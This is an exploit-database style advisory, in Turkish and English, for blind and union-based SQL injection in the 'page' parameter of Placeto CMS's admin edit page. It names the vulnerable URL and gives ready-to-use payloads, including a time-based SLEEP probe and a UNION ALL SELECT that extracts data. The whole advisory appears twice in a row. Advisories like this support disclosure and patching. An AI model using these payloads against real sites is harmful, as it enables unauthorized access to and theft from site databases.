# Title/Başlık: Placeto CMS
# Date/Tarih: 21.03.2019
# Exploit Author/Exploit Yazarı: Abdullah Çelebi
# Vendor Homepage/Yapımcı Adresi: https://sourceforge.net/projects/placeto/
# Software Link/Yazılım Linki: https://sourceforge.net/projects/placeto/files/alpha-rv.4/placeto.zip
# Version: Alpha rv.4
# Category/Kategori: Webapps
# Tested on/Test Edilen Platform: WAMPP win
# Software description/Yazılım Açıklaması:Kullanımı kolay bir CMS(içerik yönetim sistemi)dir.Hızlı olması ve hafızada az alan kaplaması için yazılmıştır.Bant genişliğini ve CPU süresini kısaltır.
# Vulnerabilities:
Saldırgan, şu parametreleri kullanarak admin veritabanına erişim sağlayabilir:
# POC - SQLi :
# Parameter: page (GET)
# Request URL: http://localhost/placeto/admin/edit.php?page=key
# Type : boolean-based blind
page=JyI" AND 1647=1647 AND "svwN"="svwN
# Type : time-based blind
page=JyI" AND SLEEP(5) AND "uIvY"="uIvY
# Type : union query
page=-8388" UNION ALL SELECT
NULL,CONCAT(0x716b627671,0x6a636f485445445466517a4a6f6972635551635179725550617072647371784f6445576b74736849,0x716b6b6b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
CbSf
# Exploit Adresi : https://www.exploit-db.com/exploits/46588
# Date/Tarih: 21.03.2019
# Exploit Author/Exploit Yazarı: Abdullah Çelebi
# Vendor Homepage/Yapımcı Adresi: https://sourceforge.net/projects/placeto/
# Software Link/Yazılım Linki: https://sourceforge.net/projects/placeto/files/alpha-rv.4/placeto.zip
# Version: Alpha rv.4
# Category/Kategori: Webapps
# Tested on/Test Edilen Platform: WAMPP win
# Software description/Yazılım Açıklaması:Kullanımı kolay bir CMS(içerik yönetim sistemi)dir.Hızlı olması ve hafızada az alan kaplaması için yazılmıştır.Bant genişliğini ve CPU süresini kısaltır.
# Vulnerabilities:
Saldırgan, şu parametreleri kullanarak admin veritabanına erişim sağlayabilir:
# POC - SQLi :
# Parameter: page (GET)
# Request URL: http://localhost/placeto/admin/edit.php?page=key
# Type : boolean-based blind
page=JyI" AND 1647=1647 AND "svwN"="svwN
# Type : time-based blind
page=JyI" AND SLEEP(5) AND "uIvY"="uIvY
# Type : union query
page=-8388" UNION ALL SELECT
NULL,CONCAT(0x716b627671,0x6a636f485445445466517a4a6f6972635551635179725550617072647371784f6445576b74736849,0x716b6b6b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
CbSf
# Exploit Adresi : https://www.exploit-db.com/exploits/46588
